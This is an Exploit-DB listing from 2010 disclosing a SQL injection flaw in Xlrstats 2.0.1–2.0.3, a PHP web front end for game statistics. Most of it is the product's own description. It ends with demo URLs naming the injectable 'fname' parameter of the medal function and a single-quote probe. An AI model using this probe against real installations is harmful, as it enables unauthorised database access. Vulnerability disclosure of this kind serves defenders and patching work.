Xlrstats 2.0.1 - SQL Injection

EDB-ID:

15251

CVE:



Author:

Sky4

Type:

webapps


Platform:

PHP

Date:

2010-10-14


----------------------------------------------------------------------------
# Sql injection vulnerability 
----------------------------------------------------------------------------
# Exploit Title: Xlrstats (Big Brother Bot Game) SQL injection 2.0.1
----------------------------------------------------------------------------
# Author  : Sky4 
#  Email        :  Sky4@live.com
#  Date         : 14/10/2010
#  homepage :  http://www.sky4.tk

# Software Link: http://www.bigbrotherbot.net/forums/downloads/?sa=view;down=100
# Script homepage:http://www.xlrstats.com/
# Version: 2.0.1 / 2.0.2 /2.0.3 

                          
----------------------------------------------------------
[About The Program]
XLRstats is the only Real Time game stats program 
out there. When you make a kill in game, it's in the stats at the very 
same moment! No cronjobs and perl programs to generate statistics... REAL TIME!XLRstats is a statistics plugin for BigBrotherBot (B3)
 and it stores all kill-events in a mySQL database. Stats are available 
in game using the !xlrstats command in chat, but much more can be viewed
 in the XLRstats web front!Analyze your weapon usage, where do you 
hit your enemies, who are your worst enemies... all this and more 
information is available on the site.Version 2 comes with ranks, 
medals and several templates. With the templates it's very easy to 
create your own look and feel. Create your own template matching your 
clans website... no problem.-----------------------------------------------------------<<[ Exploit ]>>--http://www.localhost.com/xlrstats/index.php?func=medal&fname=1
[demo]http://www.localhost.com/xlrstats/index.php?func=medal&fname='1'------------------------------------
##############################################################
#             www.sky4.tk
#
#             sky4@live.com
#             4hm4d H0w4ri
#          Palestine In our Hearts
##############################################################